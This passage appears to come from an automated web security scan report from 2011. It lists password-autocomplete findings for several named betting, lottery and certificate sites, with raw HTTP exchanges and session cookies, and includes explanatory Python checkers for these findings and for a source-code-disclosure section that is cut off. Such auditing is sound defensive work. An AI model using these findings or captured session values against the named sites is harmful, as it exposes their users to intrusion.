<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.155. https://www.interwetten.com/en/sailing-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/sailing-betting

Issue detail

The page contains a form with the following action URL: /en/sailing-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/sailing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:29 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:28 GMT
Connection: close
Content-Length: 223288
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/sailing-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.156. https://www.interwetten.com/en/scratch/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/scratch/default.aspx

Issue detail

The page contains a form with the following action URL: /en/scratch/default.aspx
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/scratch/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Content-Length: 59162
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
...[SNIP]...
<!-- ClickTale end of Top part -->

<form method="post" action="/en/scratch/default.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.157. https://www.interwetten.com/en/ski-alpine-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/ski-alpine-betting

Issue detail

The page contains a form with the following action URL: /en/ski-alpine-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/ski-alpine-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223263
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/ski-alpine-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.158. https://www.interwetten.com/en/skill/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/skill/default.aspx

Issue detail

The page contains a form with the following action URL: /en/skill/default.aspx
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/skill/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<!-- ClickTale end of Top part -->

<form method="post" action="/en/skill/default.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.159. https://www.interwetten.com/en/sportsbook/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/sportsbook/default.aspx

Issue detail

The page contains a form with the following action URL: /en/sportsbook/default.aspx
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/sportsbook/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:01 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:01 GMT
Content-Length: 321963
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<!-- ClickTale end of Top part -->
<form method="post" action="/en/sportsbook/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.160. https://www.interwetten.com/en/tennis-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/tennis-betting

Issue detail

The page contains a form with the following action URL: /en/tennis-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/tennis-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:08 GMT
Connection: close
Content-Length: 228946
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/tennis-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.161. https://www.interwetten.com/en/volleyball-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/volleyball-betting

Issue detail

The page contains a form with the following action URL: /en/volleyball-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/volleyball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:10 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:10 GMT
Connection: close
Content-Length: 223303
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/volleyball-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.162. https://www.interwetten.com/en/water-polo-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/water-polo-betting

Issue detail

The page contains a form with the following action URL: /en/water-polo-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/water-polo-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:19 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:19 GMT
Connection: close
Content-Length: 221931
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/water-polo-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.163. https://www.interwetten.com/en/winter-games-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/winter-games-betting

Issue detail

The page contains a form with the following action URL: /en/winter-games-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/winter-games-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 221922
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/winter-games-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.164. http://www.postcodelottery.com/MyAccount.htm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /MyAccount.htm

Issue detail

The page contains a form with the following action URL: /web/form
The form contains the following password field with autocomplete enabled: f90908

Request

GET /MyAccount.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:36 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16408

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...
</script>
           <form action="/web/form" name="f91519f" id="f91519f" method="post" enctype="multipart/form-data"><fieldset style="display:none" >
...[SNIP]...
</label>
                       <input type="password" class="text " id="password" name="f90908" size="20" maxlength="250" value="" />
                   
               </div>
...[SNIP]...

13.165. http://www.tstglobal.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tstglobal.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://members.tstglobal.com/login.php
The form contains the following password field with autocomplete enabled: login-password

Request

GET / HTTP/1.1
Host: www.tstglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:32:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-EN" lang="en-EN">

<head>
   <title
...[SNIP]...
</h2>
<form action="http://members.tstglobal.com/login.php" method="post">
       <input type="hidden" name="Submit" value="1">
...[SNIP]...
</label>
<input type="password" name="login-password" id="login-password" value="" />

<input type="image" src="/assets/images/interface/button-login.gif" id="login-submit" alt="Login" />
...[SNIP]...

13.166. http://www.verisign.co.uk/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled: password

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...
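
The check behind the "password field with autocomplete enabled" entries above can be reproduced offline against saved response bodies. The following is an added example, not code from the original report or from any of the sites listed in it: it pairs every type="password" input with its enclosing form and reports the field unless the input or the form carries autocomplete="off". The sample markup is constructed for the example; the first sample follows the shape of the ASP.NET login widget in the interwetten.com responses (a text "placebo" box swapped for the real password box on focus, and no autocomplete attribute anywhere). One caveat a practitioner should keep in mind: since around 2014 mainstream browsers ignore autocomplete="off" on login password fields so that their password managers keep working, so the remediation this finding implies has little effect on current browsers and the issue is informational at best.

```python
"""Reproduce the "password field with autocomplete enabled" check offline.

Added example: not code from the original report or from the sites in it.
It parses an HTML response, pairs every type="password" input with its
enclosing <form>, and reports the field unless the input or the form
carries autocomplete="off". The sample markup below is constructed.
"""
from html.parser import HTMLParser


class PasswordFormScanner(HTMLParser):
    """Collect one finding per password input: form action, field name, state."""

    def __init__(self):
        super().__init__()
        self._forms = []       # stack of (action, form_has_autocomplete_off)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases attribute names; a valueless attribute is None.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._forms.append((a.get("action", ""),
                                a.get("autocomplete", "").lower() == "off"))
        elif tag == "input" and a.get("type", "text").lower() == "password":
            action, form_off = self._forms[-1] if self._forms else ("", False)
            field_off = a.get("autocomplete", "").lower() == "off"
            self.findings.append({
                "action": action,
                "field": a.get("name") or a.get("id", ""),
                "autocomplete_enabled": not (form_off or field_off),
            })

    def handle_endtag(self, tag):
        if tag == "form" and self._forms:
            self._forms.pop()


def scan(html):
    """Return all password-field findings in one HTML body."""
    parser = PasswordFormScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def autocomplete_enabled_fields(html):
    """Only what a scanner would report: password fields left autocompletable."""
    return [f for f in scan(html) if f["autocomplete_enabled"]]


# Constructed samples. The first mirrors the ASP.NET login widget in the
# report: the "placebo" box is type="text" and is correctly not reported.
SAMPLE_ENABLED = """
<form method="post" action="/en/politics-betting" id="aspnetForm">
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" />
<input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" />
<input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" />
</form>"""
SAMPLE_FIELD_OFF = ('<form action="/login"><input type="password" name="pw" '
                    'autocomplete="off" /></form>')
SAMPLE_FORM_OFF = ('<form action="/login" autocomplete="off">'
                   '<input type="password" name="pw" /></form>')

if __name__ == "__main__":
    for name, body in [("enabled", SAMPLE_ENABLED), ("field off", SAMPLE_FIELD_OFF),
                       ("form off", SAMPLE_FORM_OFF)]:
        print(name, autocomplete_enabled_fields(body))
```

Feed each saved response body to autocomplete_enabled_fields(); the action and field name it returns are the two values the report lists per entry. The form-level autocomplete="off" case is handled explicitly because scanners that only look at the input attribute report false positives on such forms.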

14. Source code disclosure
There are 13 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
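
A practitioner reviewing findings of this kind usually wants two things: a way to re-run the check over saved responses, and a first guess at which of the causes named above applies. The following added example (not code from the original report or from the sites in it) does both for PHP and ASP/JSP fragments. A browser parses a raw <?...> sequence in an HTML document as a bogus processing instruction and renders nothing, so this class of leak is invisible on screen and only shows up in the raw body. The sample bodies are constructed; the first copies the shape of the leak in the neogames-tech.com findings below, where the open tag is glued to a // comment.

```python
"""Flag server-side code fragments that reached the client.

Added example, not code from the original report or from the sites in it.
It reproduces the tentative "source code disclosure" check for raw PHP
(<?php ... ?>, <?= ... ?>) and ASP/JSP (<% ... %>) blocks left in an HTML
body, and attaches a first guess at why each PHP block leaked. Sample
bodies are constructed.
"""
import re

# Lazy match up to the closing ?>; a block with no closing tag runs to the end.
PHP_BLOCK = re.compile(r"<\?(?:php|=)(?:.*?\?>|.*$)", re.S | re.I)
ASP_BLOCK = re.compile(r"<%.*?%>", re.S)
PHP_OPEN_TAG = re.compile(r"<\?php(.?)", re.I)


def likely_cause(fragment):
    """Heuristic triage of a PHP fragment: why did the interpreter not run it?"""
    m = PHP_OPEN_TAG.match(fragment)
    if m and m.group(1) and not m.group(1).isspace():
        # PHP's lexer only accepts '<?php' followed by whitespace (short tags
        # off), so '<?php//' is inline HTML to it and is sent verbatim.
        return ("open tag glued to the next token: PHP only recognises '<?php' "
                "followed by whitespace, so the block was emitted as inline HTML")
    if fragment.lower().startswith("<?="):
        return "short echo tag '<?=' on a PHP build older than 5.4 with short_open_tag=Off"
    return "file not executed by the PHP handler (extension, permissions or handler mapping)"


def find_leaks(body):
    """Return a list of {"lang", "fragment", "cause"} dicts for one response body."""
    leaks = []
    for m in PHP_BLOCK.finditer(body):
        leaks.append({"lang": "php", "fragment": m.group(0),
                      "cause": likely_cause(m.group(0))})
    for m in ASP_BLOCK.finditer(body):
        leaks.append({"lang": "asp", "fragment": m.group(0),
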